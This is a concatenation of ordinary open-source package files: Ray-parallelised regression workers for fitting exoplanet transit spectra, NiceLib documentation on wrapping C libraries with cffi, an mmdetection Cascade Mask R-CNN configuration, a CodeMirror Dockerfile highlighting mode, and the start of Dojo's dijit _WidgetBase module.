select_regressors(data_parameters.ROI,
cpm_parameters.nwidth)
self.iterators.bootsptrap_indici, _ = \
make_bootstrap_samples(data_parameters.shape[-1],
cpm_parameters.nboot)
self.iterators.combined_full_model_indici = itertools.product(
enumerate(self.iterators.bootsptrap_indici[:1]),
enumerate(self.iterators.regressor_indici))
self.iterators.n_iterators_full_model = \
data_parameters.max_spectral_points
self.iterators.combined_bootstrap_model_indici = itertools.product(
enumerate(self.iterators.bootsptrap_indici),
enumerate(self.iterators.regressor_indici))
self.iterators.n_iterators_bootstrap_model = \
data_parameters.max_spectral_points*(cpm_parameters.nboot+1)
self.chunk_iterators(nchunks=nchunks)
def reset_fit_parameters(self):
"""
Reset the fitted parameters on the parameter server.
Returns
-------
None.
"""
ray.get(self.parameter_server_handle.reset_parameters.remote())
@staticmethod
def get_data_chunck(data_server_handle, regression_selection,
bootstrap_selection):
"""
Get a chunk of the data to be used in the regression analysis.
Parameters
----------
data_server_handle : 'regressioDataServer'
Instance of the regressionDataServer class.
regression_selection : 'tuple'
tuple containing indici defing the data and regression matrix for
all wavelength indici.
bootstrap_selection : 'ndarray'
indici defining the bootstrap sampling.
Returns
-------
regression_data_selection : 'ndarray'
Selected data to be modeled.
regression_matirx_selection : 'ndarray'
data used as design matrix in regression modeling of the
selected data.
"""
regression_data_selection, regression_matirx_selection = \
ray.get(data_server_handle.get_regression_data.remote(
regression_selection,
bootstrap_indici=bootstrap_selection))
return regression_data_selection, regression_matirx_selection
@staticmethod
def get_data_per_bootstrap_step(data_server_handle, regression_selections,
bootstrap_selection):
"""
Get all data chunks to be used in the regression analysis per bootstrap step.
Parameters
----------
data_server_handle : 'regressioDataServer'
Instance of the regressionDataServer class.
regression_selections : TYPE
DESCRIPTION.
bootstrap_selection : 'ndarray'
indici defining the bootstrap sampling.
Returns
-------
selection_list: 'list'
List with all data and regression matrix selections
"""
selection_list = \
ray.get(data_server_handle.get_all_regression_data.remote(
regression_selections, bootstrap_indici=bootstrap_selection))
return selection_list
def add_fit_parameters_to_parameter_server(self, new_parameters):
"""
Add the fited refression parameters to the parameter server.
Parameters
----------
new_parameters : TYPE
DESCRIPTION.
Returns
-------
None.
"""
ray.get(
self.parameter_server_handle.
add_new_parameters.remote(new_parameters)
)
def run_regression_model(self):
"""
Run the regression model.
This method runs the regression method for the instrument systematics
and the transit depth determination.
Returns
-------
None.
"""
# number of data chanks is the number of workers
nchunks = self.number_of_workers
# define the iterator chunks
self.initialize_regression_iterators(nchunks=nchunks)
# This launches workers on the full (non bootstrapped) data set
# and determines the optimal regularization
initial_fit_parameters = \
copy.deepcopy(self.get_fit_parameters_from_server())
initial_regularization = \
self.get_regularization_parameters_from_server()
workers = [
rayRegressionWorker.remote(initial_fit_parameters,
initial_regularization,
iterator_chunk)
for iterator_chunk in self.iterators.chunked_full_model_iterator
]
ndata_servers=len(self.data_server_handle)
futures = [w.async_update_loop.remote(self.parameter_server_handle,
self.data_server_handle[iserver%ndata_servers])
for iserver, w in enumerate(workers)]
ray.get(futures)
# This launches workers on the bootstrapped data set + original data
# and determines the fit parameters and error there on
updated_regularization = \
copy.deepcopy(self.get_regularization_parameters_from_server())
# re-initialize workers with optimal regularization
futures = [w.update_initial_parameters.remote(initial_fit_parameters,
updated_regularization,
iterator_chunk)
for w, iterator_chunk in zip(
workers, self.iterators.chunked_bootstrap_model_iterator
)]
ray.get(futures)
# reset parameters on server for final run.
self.reset_fit_parameters()
futures = [w.async_update_loop.remote(self.parameter_server_handle,
self.data_server_handle[iserver%ndata_servers])
for iserver, w in enumerate(workers)]
ray.get(futures)
class regressionWorker:
"""
Regression worker class.
This class defines the workers used in the regression analysis to
determine the systematics and transit model parameters.
"""
def __init__(self, initial_fit_parameters, initial_regularization,
iterator_chunk):
self.fit_parameters = copy.deepcopy(initial_fit_parameters)
self.regularization = copy.deepcopy(initial_regularization)
self.iterator = iterator_chunk
def update_initial_parameters(self,
updated_fit_parameters,
updated_regularization,
updated_iterator_chunk):
"""
Update all parameters.
Parameters
----------
updated_fit_parameters : 'simpleNameSpace'
All parameters controling the regression model.
updated_regularization : 'simpleNameSpace'
All parameters controling the regularization.
updated_iterator_chunk : 'list'
Iterator chunck over data and bootstrap selections.
Returns
-------
None.
"""
self.fit_parameters = copy.deepcopy(updated_fit_parameters)
self.regularization = copy.deepcopy(updated_regularization)
self.iterator = updated_iterator_chunk
def compute_model(self, regression_data, regularization_method, alpha):
"""
Compute the regression model.
Parameters
----------
regression_selection : 'list'
DESCRIPTION.
bootstrap_selection : 'list'
DESCRIPTION.
data_server_handle : 'regressionDataServer'
DESCRIPTION.
regularization_method : 'str'
DESCRIPTION.
alpha : 'float' or 'ndarray'
DESCRIPTION.
Returns
-------
beta_optimal : 'ndarray'
DESCRIPTION.
rss : 'float'
DESCRIPTION.
mse : 'float'
DESCRIPTION.
degrees_of_freedom : 'float'
DESCRIPTION.
model_unscaled : 'ndarray'
DESCRIPTION.
alpha : 'float'
DESCRIPTION.
"""
# Get data and regression matrix
regression_data_selection, regression_matirx_selection = \
regression_data
data_unscaled, wavelength, phase, covariance, _ = \
regression_data_selection
(regression_matrix_unscaled, n_additional, feature_mean,
feature_scale) = regression_matirx_selection
# create regularization matrix
n_data, n_parameter = regression_matrix_unscaled.shape
delta = create_regularization_matrix(regularization_method,
n_parameter,
n_additional)
# do ridge regression
(beta_optimal, rss, mse, degrees_of_freedom,
model_unscaled, alpha, aic) = \
ridge(regression_matrix_unscaled, data_unscaled,
covariance, delta, alpha)
# scale coefficients back
beta_optimal[0] -= np.sum(beta_optimal[2:]*feature_mean /
feature_scale)
beta_optimal[2:] = beta_optimal[2:]/feature_scale
return (beta_optimal, rss, mse, degrees_of_freedom, model_unscaled,
alpha, aic, phase, wavelength)
@staticmethod
def get_data_chunck(data_server_handle, regression_selection,
bootstrap_selection):
"""
Get a chanck of the data.
Parameters
----------
data_server_handle : 'regressionDataDerver'
Instance of the regressionDataDerver class.
regression_selection : 'list'
List of indici defining the data to tbe modeld and the
corresponding data to tbe used as regressors.
bootstrap_selection : 'list'
List of indici defining the bootstrap selection.
Returns
-------
regression_data_selection : 'ndarray'
Selection of data to be modeled
regression_matirx_selection : TYPE
Selection of data used as regression matrix.
"""
regression_data_selection, regression_matirx_selection = \
data_server_handle.get_regression_data(
regression_selection,
bootstrap_indici=bootstrap_selection)
return regression_data_selection, regression_matirx_selection
@staticmethod
def get_data_per_bootstrap_step(data_server_handle, regression_selections,
bootstrap_selection):
"""
Get all data chunks to be used in the regression analysis per bootstrap step.
Parameters
----------
data_server_handle : 'regressioDataServer'
Instance of the regressionDataServer class.
regression_selections : TYPE
DESCRIPTION.
bootstrap_selection : 'ndarray'
indici defining the bootstrap sampling.
Returns
-------
selection_list: 'list'
List with all data and regression matrix selections
"""
selection_list = \
data_server_handle.get_all_regression_data(
regression_selections, bootstrap_indici=bootstrap_selection)
return selection_list
@staticmethod
def get_regression_data_chunk(data_server_handle, iterator_chunk):
"""
bla.
Parameters
----------
data_server_handle : TYPE
DESCRIPTION.
iterator_chunk : TYPE
DESCRIPTION.
Returns
-------
selection_list : TYPE
DESCRIPTION.
"""
selection_list = \
data_server_handle.get_regression_data_chunk(iterator_chunk)
return selection_list
@staticmethod
def get_regression_parameters(parameter_server_handle):
"""
Get regression controll parameters from parameter server.
Parameters
----------
parameter_server_handle : regressionParameterServer
instance of the parameter server.
Returns
-------
n_additional : 'int'
Number of additional regressors.
ncorrect : 'int'
Number of data points at the short wavelength side cut by the
region of interest compared to the full dataset. This parameter is
used to make sure the parameters are stored correctly in an array
with a size corresponding to the total data volume.
"""
regression_par = parameter_server_handle.get_regression_parameters()
n_additional = regression_par.n_additional_regressors
n_sub_chunks = regression_par.number_of_sub_chunks_per_load
data_par = parameter_server_handle.get_data_parameters()
ncorrect = data_par.ncorrect
return n_additional, ncorrect, n_sub_chunks
def update_parameters_on_server(self, parameter_server_handle):
"""
Update parameters on parameter server.
Parameters
----------
parameter_server_handle : 'regressionParameterServer''
Instane of the parameter server class
Returns
-------
None.
"""
ftrs = parameter_server_handle.\
update_fitted_parameters(self.fit_parameters)
ftrs = parameter_server_handle.\
update_optimal_regulatization(self.regularization)
@staticmethod
def chunks(lst, n):
"""Yield successive n-sized chunks from lst."""
for i in range(0, len(lst), n):
yield lst[i:i + n]
def async_update_loop(self, parameter_server_handle, data_server_handle):
"""
Regression loop over regressin and bootstrap selection.
Parameters
----------
parameter_server_handle : 'regressionParameterServer'
Instance of the paramter server
data_server_handle : 'regressionDataServer'
Instance of the data server.
Returns
-------
None.
"""
n_additional, ncorrect, n_sub_chunks = \
self.get_regression_parameters(parameter_server_handle)
regularization_method = 'value'
iterator_chunk, chunk_size = self.iterator
sub_chunks = self.chunks(iterator_chunk, n_sub_chunks)
for sub_chunk in sub_chunks:
regression_data_sub_chunk = self.get_regression_data_chunk(data_server_handle, sub_chunk)
for ((iboot, bootstrap_selection),\
(idata_point, regression_selection)), regression_data in zip(sub_chunk,regression_data_sub_chunk) :
(_, _), (index_disp_regressors, _), nwave = regression_selection
(beta_optimal, rss, mse, degrees_of_freedom, model_unscaled,
alpha, aic, phase, wavelength) = self.compute_model(
regression_data,regularization_method,
self.regularization.optimal_alpha[idata_point])
self.regularization.optimal_alpha[idata_point] = alpha
self.fit_parameters.\
fitted_spectrum[iboot, idata_point] = beta_optimal[1]
self.fit_parameters.\
fitted_model[iboot, idata_point, :] = model_unscaled
self.fit_parameters.\
fitted_time[iboot, idata_point, :] = phase
self.fit_parameters.\
wavelength_fitted_spectrum[iboot, idata_point] = wavelength
self.fit_parameters.fitted_mse[iboot, idata_point] = mse
self.fit_parameters.fitted_aic[iboot, idata_point] = aic
self.fit_parameters.\
degrees_of_freedom[iboot, idata_point] = degrees_of_freedom
self.fit_parameters.\
regression_results[
iboot, idata_point,
index_disp_regressors+n_additional-ncorrect
] = beta_optimal[n_additional:]
self.fit_parameters.\
regression_results[iboot, idata_point, 0:n_additional] = \
beta_optimal[0:n_additional]
del regression_data_sub_chunk
self.update_parameters_on_server(parameter_server_handle)
@ray.remote
class rayRegressionWorker(regressionWorker):
"""Ray wrapper regressionDataServer class."""
def __init__(self, initial_fit_parameters, initial_regularization,
iterator_chunk):
super().__init__(initial_fit_parameters, initial_regularization,
iterator_chunk)
@staticmethod
def get_data_chunck(data_server_handle, regression_selection,
bootstrap_selection):
"""
Get a chanck of the data.
Parameters
----------
data_server_handle : 'regressionDataDerver'
DESCRIPTION.
regression_selection : 'list'
List of indici defining the data to tbe modeld and the
corresponding data to tbe used as regressors.
bootstrap_selection : 'list'
List of indici defining the bootstrap selection.
Returns
-------
regression_data_selection : 'ndarray'
Selection of data to be modeled
regression_matirx_selection : TYPE
Selection of data used as regression matrix.
"""
regression_data_selection, regression_matirx_selection = \
ray.get(data_server_handle.get_regression_data.remote(
regression_selection,
bootstrap_indici=bootstrap_selection))
return regression_data_selection, regression_matirx_selection
@staticmethod
def get_data_per_bootstrap_step(data_server_handle, regression_selections,
bootstrap_selection):
"""
Get all data chunks to be used in the regression analysis per bootstrap step.
Parameters
----------
data_server_handle : 'regressioDataServer'
Instance of the regressionDataServer class.
regression_selections : TYPE
DESCRIPTION.
bootstrap_selection : 'ndarray'
indici defining the bootstrap sampling.
Returns
-------
selection_list: 'list'
List with all data and regression matrix selections
"""
selection_list = \
ray.get(data_server_handle.get_all_regression_data.remote(
regression_selections, bootstrap_indici=bootstrap_selection))
return selection_list
@staticmethod
def get_regression_data_chunk(data_server_handle, iterator_chunk):
"""
bla.
Parameters
----------
data_server_handle : TYPE
DESCRIPTION.
iterator_chunk : TYPE
DESCRIPTION.
Returns
-------
selection_list : TYPE
DESCRIPTION.
"""
selection_list = \
ray.get(data_server_handle.get_regression_data_chunk.remote(
iterator_chunk))
return selection_list
@staticmethod
def get_regression_parameters(parameter_server_handle):
"""
Get regression controll parameters from parameter server.
Parameters
----------
parameter_server_handle : regressionParameterServer
instance of the parameter server.
Returns
-------
n_additional : 'int'
Number of additional regressors.
ncorrect : 'int'
Number of data points at the short wavelength side cut by the
region of interest compared to the full dataset. This parameter is
used to make sure the parameters are stored correctly in an array
with a size corresponding to the total data volume.
"""
regression_par = \
ray.get(parameter_server_handle.get_regression_parameters.remote())
n_additional = regression_par.n_additional_regressors
n_sub_chunks = regression_par.number_of_sub_chunks_per_load
data_par = \
ray.get(parameter_server_handle.get_data_parameters.remote())
ncorrect = data_par.ncorrect
return n_additional, ncorrect, n_sub_chunks
def update_parameters_on_server(self, parameter_server_handle):
"""
Update parameters on parameter server.
Parameters
----------
parameter_server_handle : 'regressionParameterServer''
Instane of the parameter server class
Returns
-------
None.
"""
ftrs = parameter_server_handle.\
update_fitted_parameters.remote(self.fit_parameters)
ray.get(ftrs)
ftrs = parameter_server_handle.\
update_optimal_regulatization.remote(self.regularization)
ray.get(ftrs) | PypiClean |
/NiceLib-0.7.1.zip/NiceLib-0.7.1/docs/wrapping.rst | Creating Mid-Level Bindings
===========================
`NiceLib` is the base class that provides a nice interface for quickly defining mid-level library bindings. You define a subclass for each specific library (.dll/.so file) you wish to wrap. `NiceLib`'s metaclass then converts your specification into a wrapped library. You use this subclass directly, without instantiating it.
What Are Mid-Level Bindings?
----------------------------
It's worth discussing what we mean by "mid-level" bindings. Mid-level bindings have a one-to-one correspondence between low-level functions and mid-level functions. The difference is that each mid-level function has a more Pythonic interface that lets the user mostly or entirely avoid working with ``cffi`` directly. In other words, the overall structure of the library stays the same, but each individual function's interface may change.
These mid-level bindings can then be used to craft high-level bindings that might have a completely different structure than the underlying low-level library.
Let's say we want to wrap a motor-control library and its header looks something like this:
.. code-block:: c
// Example header file
typedef void* HANDLE;
int GeneralGetDeviceList(uint* devList, uint listSize);
void GeneralGetErrorString(int errCode, char *recvBuf, uint bufSize);
int GeneralOpenMotor(uint motorID, HANDLE *phMotor);
int MotorClose(HANDLE hMotor);
int MotorMoveTo(HANDLE hMotor, long pos);
int MotorGetPosition(HANDLE hMotor, long *pPos);
int MotorGetSerial(HANDLE hMotor, char *recvBuf, uint bufSize);
We would then write bindings like this::
from nicelib import load_lib, NiceLib, Sig, NiceObject, RetHandler, ret_ignore
@RetHandler(num_retvals=0)
def ret_errcode(retval):
if retval != 0:
raise MotorError(NiceMotor.GetErrorString(retval))
class NiceMotor(NiceLib):
_info_ = load_lib('awesomemotor', __package__)
_ret_ = ret_errcode
_prefix_ = 'General'
GetDeviceList = Sig('arr', 'len=20')
GetErrorString = Sig('in', 'buf', 'len', ret=ret_ignore)
OpenMotor = Sig('in', 'out')
class Motor(NiceObject):
_init_ = 'OpenMotor'
_prefix_ = 'Motor'
Close = Sig('in')
MoveTo = Sig('in', 'in')
GetPosition = Sig('in', 'out')
GetSerial = Sig('in', 'buf', 'len=64')
Then we can use the library like this::
motor_ids = NiceMotor.GetDeviceList()
for motor_id in motor_ids:
motor = NiceMotor.Motor(motor_id)
pos = motor.GetPosition()
serial = motor.GetSerial()
print("Motor {} is at position {}".format(serial, pos))
motor.Close()
There are a number of features in use in this example: prefix removal, return value wrapping, array and string buffer output, and a `NiceObject` with custom initializers. These make use of settings, which you can read more about below.
.. _settings:
Settings
--------
Settings, also called flags, give you extra control over how a library is wrapped. Settings are scoped, meaning that you can specify them on a class-wide, NiceObject-wide, and per-function basis. For example:
1. **Class-level**:
Give the NiceLib class an attribute with the setting name surrounded by single underscores::
class MyLib(NiceLib):
_buflen_ = 128
2. **NiceObject-level**:
Give the NiceObject class an attribute with the setting name surrounded by single underscores::
class MyLib(NiceLib):
class MyObject(NiceObject):
_buflen_ = 128
3. **Function-level**:
Pass settings as keyword args to the ``Sig`` constructor::
MyFunction = Sig('in', 'in', 'out', buflen=128)
The available settings are:
prefix
A ``str`` or sequence of ``str``\s specifying prefixes to strip from the library function names. For example, if the library has functions named like ``SDK_Func()``, you can set ``_prefix_`` to ``'SDK_'``, and access them as ``Func()``. If multiple prefixes are given, they are tried in order for each signature until the appropraite function is found. The empty prefix ``''`` is always tried. Sometimes you may want to specify one library-wide prefix and a different per-object prefix, as done in the above example.
These prefixes also get stripped from macro names and enum constants.
ret
A function or ``str`` specifying a handler function to handle the return values of each library function. See :ref:`retval-handlers` for details.
buflen
An ``int`` specifying the default length for buffers and arrays. This can be overridden on a per-argument basis in the argument's spec string, e.g. ``'len=64'`` will make a 64-character buffer or a 64-element array.
free_buf
A function that is called on the pointer returned for 'bufout' argtypes, used for freeing their associated memory. It is called immediately after the buffer is copied to produce a Python string, but is not called if a null pointer is returned. May be None.
use_numpy
If True, convert output args marked as ``'arr'`` to numpy arrays. Requires numpy to be installed.
struct_maker
A function that is called to create an FFI struct of the given type. Mainly useful for odd libraries that require you to always fill out some field of the struct, like its size in bytes.
use_handle
Useful for creating "static methods" within a ``NiceObject``\—if False, the ``NiceObject``\'s handle(s) will not be passed into the C function. True by default. It only makes sense to specify this at the per-function level within a ``NiceObject``.
``NiceLib`` Class Attributes
----------------------------
``NiceLib`` subclasses make use of a few underscore-surrounded special class attributes. In addition to the class-wide *settings* described above, they include:
_info_
A :py:class:`LibInfo` object that contains access to the underlying library and macros. Required (unless you are using the old-style ``_ffi_``, ``_ffilib_``, and ``_defs_`` attributes)
Typically you will want to pass the relevant library attributes via a :py:class:`LibInfo` instance created using :py:func:`~nicelib.load_lib`, as shown in the examples above. However, it is currently possible to specify them directly. This was the original method, but may become deprecated in later versions of `NiceLib`.
_ffi_
FFI instance variable. Required if not using ``_info_``.
_ffilib_
FFI library opened with ``ffi.dlopen()``. Required if not using ``_info_``.
_defs_
``dict`` containing the Python-equivalent macros defined in the header file(s). Optional and only used if not using ``_info_``.
Function Signatures
-------------------
Function signatures are specified as ``Sig`` class attributes. A ``Sig``\s positional args are strings that define the input-output signature of the underlying C function. Per-function settings, like custom return value handling, are passed as keyword args.
It's important to note that a ``Sig`` is designed to closely match the signature of its C function, i.e. there's a one-to-one correspondence between arg strings and C function args.
The basic idea behind signature specifications is to handle input and output in a more Pythonic manner---inputs get passed in via a function's arguments, while its outputs get returned as part of the function's return values. Take the simple example from above::
OpenMotor = Sig('in', 'out')
This says that the C function's first argument (``uint motorID``) is used strictly as input, and its second argument (``HANDLE *phMotor``) is used strictly as output---the function takes an ID number and returns a handle to a newly opened motor. Using this signature allows us to call the function more naturally as ``handle = OpenMotor(motorID)``.
The available signature values are:
'in'
The argument is an input and gets passed into the mid-level function.
'out'
The argument is an output. It is not passed into the mid-level function, but is instead added to the list of return values. NiceLib automatically allocates an appropriate data structure, passes its address-pointer to the C function, uses the dereferenced result as the return value.
This can't be used for ``void`` pointers, since there's no way to know what to allocate, or what type to return.
'inout'
The argument is used as both input and output. The mid-level function takes it as an argument and also returns it with the return values. You can pass in either a value or a pointer to the value. For example, if the underlying C argument is an ``int *``, you can pass in a ``cffi`` ``int`` pointer, which will be used directly, or (more typically) you can pass in a Python int, which will be used as the initial value of a newly-created ``cffi`` int pointer.
'arr'
The argument is an array used only for *output*. The C argument is a pointer or array, into which the C-function writes. The result is added to the return values.
This is used for the common case of a C function which takes both an array (or pointer to a block of memory) and its length as inputs, to ensure that it doesn't overrun the array. As such, each ``'arr'`` requires a corresponding ``'len'`` entry. The first ``'arr'``/``'buf'`` in a ``Sig`` is matched with the first ``'len'`` and so forth. If the array is fixed-length and you don't need to pass in a length parameter to the C-function, use ``'arr[n]'`` as described below. If you need to pass in the array (and not auto-create it), use ``'in'``.
NiceLib will automatically create the buffer and pass it and the length parameter to the C-function. You simply receive the resulting array.
'arr[n]'
The same as ``'arr[n]'``, but does not have a matching ``'len'``. Because of this, the array length is specified directly as an int. For example, a 20-char buffer would be ``'arr[20]'``.
'bufout'
The argument is a pointer to a string buffer (a ``char**``). This is used for when the C library creates a string buffer and returns it to the user. NiceLib will automatically convert the output to a Python ``bytes``, or None if a null pointer was returned.
If the memory should be cleaned up by the user (as is usually the case), you may use the ``free_buf`` setting to specify the cleanup function.
'buf'
The same as ``'arr'``, but decodes the output string using ``ffi.string()`` before adding it to the return values.
This is used for the common case of a C function which takes both a string buffer and its length as inputs, so that it doesn't overrun the buffer. As such, ``'buf'`` requires a corresponding ``'len'`` entry. The first ``'buf'``/``'arr'`` is matched with the first ``'len'`` and so forth. If you don't need to pass in a length parameter to the C-function, use ``'buf[n]'`` as described below.
NiceLib will automatically create the buffer and pass it and the length parameter to the C-function. You simply receive the ``bytes``.
'buf[n]'
The same as ``'buf'``, but does not have a matching ``'len'``. Because of this, the buffer length is specified directly as an int. For example, a 20-char buffer would be ``'buf[20]'``.
'len'
The length of the buffer being passed to the C-function. See ``'arr'`` and ``'buf'`` for more info. This will use the length given by the innermost ``buflen`` flag/setting.
'len=n'
The same as ``'len'``, but with a directly specified length. For example, ``'len=32'`` allocates a buffer or array of length 32, regardless of the value of ``buflen``.
'len=in'
Similar to ``'len=n'``, except the mid-level function takes an input argument which is an ``int`` specifying the size of buffer that should be allocated for that invocation.
'ignore'
Ignore the argument, passing in 0 or NULL, depending on the arg type. This is useful for functions with "reserved" arguments which don't do anything.
.. _retval-handlers:
Return Value Handlers
---------------------
``RetHandler``\s, which specify functions to handle the return values of each library function, are given via the ``ret`` flag, as mentioned in :ref:`settings`. Return handlers are created by using the ``@RetHandler`` decorator---for example, the built-in ``ret_return`` handler is defined thusly::
@RetHandler(num_retvals=1)
def ret_return(retval):
return retval
``num_retvals`` indicates the number of values that the handler returns, which is often zero. Return handlers can be used to raise exceptions, return values, or even do custom handling based on what args were passed to the function.
A handler function takes the C function's return value---often an error/success code---as its first argument (see below for other optional parameters it may take). If the handler returns a non-None value, it will be appended to the wrapped function's return values.
Builtin Handlers
~~~~~~~~~~~~~~~~
There are two handlers that nicelib defines for convenience:
`ret_return()`
The default handler. Simply appends the return value to the wrapped function's return values.
`ret_ignore()`
Ignores the value entirely and does not return it. Useful for ``void`` functions
Injected Parameters
~~~~~~~~~~~~~~~~~~~
Sometimes it may be useful to give a handler more information about the function that was called, like the C parameters it was passed. If you define your handler to take one or more specially-named args, they will be automatically injected for you. These include:
funcargs
The list of all ``cffi``\-level args (including output args) that were passed to the C function
niceobj
The `NiceObject` instance whose method was called, or None for a top-level function
NiceObjects
-----------
Often a C library exposes a distinctly object-like interface like the one in our example. Essentially, you have a handle or ID of some resource (a motor in the example), which gets passed as the first argument to a subset of the library's functions. It makes sense to treat these functions as the *methods* of some type of object. NiceLib allows you to define these types of objects by subclassing `NiceObject`.
`NiceObject` class definitions are nested inside your `NiceLib` class definition, and consist of method ``Sig``\s and object-specific settings. When you instantiate a `NiceObject`, the args are passed to the `NiceObject`\'s *initializer*, which returns a handle. This handle is passed as the first parameter to all of the `NiceObject`\'s "methods" (unless the method has ``use_handle=False``). This initializer is specified using the `NiceObject`\'s ``_init_`` class attribute, which can be either a function or the name of one of the mid-level functions (as with ``'OpenMotor'`` in the example above). If ``_init_`` is not defined, the args passed to the `NiceObject`\'s constructor are used directly as the handle.
Without using ``_init_``, object construction would look like this::
handle = MyNiceLib.GetHandle()
my_obj = MyNiceLib.MyObject(handle)
my_obj.AwesomeMethod()
But if we use ``_init_``::
class MyNiceLib(NiceLib):
[...]
GetHandle = Sig('out')
class MyObject(NiceObject):
_init_ = 'GetHandle'
[...]
we can then do this::
my_obj = MyNiceLib.MyObject()
my_obj.AwesomeMethod()
and bypass passing around handles at all.
Multi-value handles
~~~~~~~~~~~~~~~~~~~
Usually an object will have only a single value as its handle, like an ID. In the unusual case that you have functions which take more than one value which act as a collective 'handle', you should specify this number as ``_n_handles_`` in your `NiceObject` subclass.
Auto-Generating Bindings
------------------------
If nicelib is able to parse your library's headers successfully, you can generate a convenient binding skeleton using `generate_bindings()`.
| PypiClean |
/DLTA-AI-1.1.tar.gz/DLTA-AI-1.1/DLTA_AI_app/mmdetection/configs/legacy_1.x/cascade_mask_rcnn_r50_fpn_1x_coco_v1.py | _base_ = [
'../_base_/models/cascade_mask_rcnn_r50_fpn.py',
'../_base_/datasets/coco_instance.py',
'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
model = dict(
type='CascadeRCNN',
backbone=dict(
type='ResNet',
depth=50,
num_stages=4,
out_indices=(0, 1, 2, 3),
frozen_stages=1,
norm_cfg=dict(type='BN', requires_grad=True),
norm_eval=True,
style='pytorch',
init_cfg=dict(type='Pretrained', checkpoint='torchvision://resnet50')),
neck=dict(
type='FPN',
in_channels=[256, 512, 1024, 2048],
out_channels=256,
num_outs=5),
rpn_head=dict(
anchor_generator=dict(type='LegacyAnchorGenerator', center_offset=0.5),
bbox_coder=dict(
type='LegacyDeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0])),
roi_head=dict(
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(
type='RoIAlign',
output_size=7,
sampling_ratio=2,
aligned=False)),
bbox_head=[
dict(
type='Shared2FCBBoxHead',
reg_class_agnostic=True,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='LegacyDeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2])),
dict(
type='Shared2FCBBoxHead',
reg_class_agnostic=True,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='LegacyDeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.05, 0.05, 0.1, 0.1])),
dict(
type='Shared2FCBBoxHead',
reg_class_agnostic=True,
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='LegacyDeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.033, 0.033, 0.067, 0.067])),
],
mask_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(
type='RoIAlign',
output_size=14,
sampling_ratio=2,
aligned=False))))
dist_params = dict(backend='nccl', port=29515) | PypiClean |
/Flask-MDEditor-0.1.4.tar.gz/Flask-MDEditor-0.1.4/flask_mdeditor/static/mdeditor/js/lib/codemirror/mode/dockerfile/dockerfile.js |
(function(mod) {
if (typeof exports == "object" && typeof module == "object") // CommonJS
mod(require("../../lib/codemirror"), require("../../addon/mode/simple"));
else if (typeof define == "function" && define.amd) // AMD
define(["../../lib/codemirror", "../../addon/mode/simple"], mod);
else // Plain browser env
mod(CodeMirror);
})(function(CodeMirror) {
"use strict";
// Collect all Dockerfile directives
var instructions = ["from", "maintainer", "run", "cmd", "expose", "env",
"add", "copy", "entrypoint", "volume", "user",
"workdir", "onbuild"],
instructionRegex = "(" + instructions.join('|') + ")",
instructionOnlyLine = new RegExp(instructionRegex + "\\s*$", "i"),
instructionWithArguments = new RegExp(instructionRegex + "(\\s+)", "i");
CodeMirror.defineSimpleMode("dockerfile", {
start: [
// Block comment: This is a line starting with a comment
{
regex: /#.*$/,
token: "comment"
},
// Highlight an instruction without any arguments (for convenience)
{
regex: instructionOnlyLine,
token: "variable-2"
},
// Highlight an instruction followed by arguments
{
regex: instructionWithArguments,
token: ["variable-2", null],
next: "arguments"
},
{
regex: /./,
token: null
}
],
arguments: [
{
// Line comment without instruction arguments is an error
regex: /#.*$/,
token: "error",
next: "start"
},
{
regex: /[^#]+\\$/,
token: null
},
{
// Match everything except for the inline comment
regex: /[^#]+/,
token: null,
next: "start"
},
{
regex: /$/,
token: null,
next: "start"
},
// Fail safe return to start
{
token: null,
next: "start"
}
]
});
CodeMirror.defineMIME("text/x-dockerfile", "dockerfile");
}); | PypiClean |
/FreePyBX-1.0-RC1.tar.gz/FreePyBX-1.0-RC1/freepybx/public/js/dijit/_WidgetBase.js.uncompressed.js | define("dijit/_WidgetBase", [
"require", // require.toUrl
"dojo/_base/array", // array.forEach array.map
"dojo/aspect",
"dojo/_base/config", // config.blankGif
"dojo/_base/connect", // connect.connect
"dojo/_base/declare", // declare
"dojo/dom", // dom.byId
"dojo/dom-attr", // domAttr.set domAttr.remove
"dojo/dom-class", // domClass.add domClass.replace
"dojo/dom-construct", // domConstruct.create domConstruct.destroy domConstruct.place
"dojo/dom-geometry", // isBodyLtr
"dojo/dom-style", // domStyle.set, domStyle.get
"dojo/_base/kernel",
"dojo/_base/lang", // mixin(), isArray(), etc.
"dojo/on",
"dojo/ready",
"dojo/Stateful", // Stateful
"dojo/topic",
"dojo/_base/window", // win.doc.createTextNode
"./registry" // registry.getUniqueId(), registry.findWidgets()
], function(require, array, aspect, config, connect, declare,
dom, domAttr, domClass, domConstruct, domGeometry, domStyle, kernel,
lang, on, ready, Stateful, topic, win, registry){
/*=====
var Stateful = dojo.Stateful;
=====*/
// module:
// dijit/_WidgetBase
// summary:
// Future base class for all Dijit widgets.
// For back-compat, remove in 2.0.
if(!kernel.isAsync){
ready(0, function(){
var requires = ["dijit/_base/manager"];
require(requires); // use indirection so modules not rolled into a build
});
}
// Nested hash listing attributes for each tag, all strings in lowercase.
// ex: {"div": {"style": true, "tabindex" true}, "form": { ...
var tagAttrs = {};
function getAttrs(obj){
var ret = {};
for(var attr in obj){
ret[attr.toLowerCase()] = true;
}
return ret;
}
function nonEmptyAttrToDom(attr){
// summary:
// Returns a setter function that copies the attribute to this.domNode,
// or removes the attribute from this.domNode, depending on whether the
// value is defined or not.
return function(val){
domAttr[val ? "set" : "remove"](this.domNode, attr, val);
this._set(attr, val);
};
}
return declare("dijit._WidgetBase", Stateful, {
// summary:
// Future base class for all Dijit widgets.
// description:
// Future base class for all Dijit widgets.
// _Widget extends this class adding support for various features needed by desktop.
//
// Provides stubs for widget lifecycle methods for subclasses to extend, like postMixInProperties(), buildRendering(),
// postCreate(), startup(), and destroy(), and also public API methods like set(), get(), and watch().
//
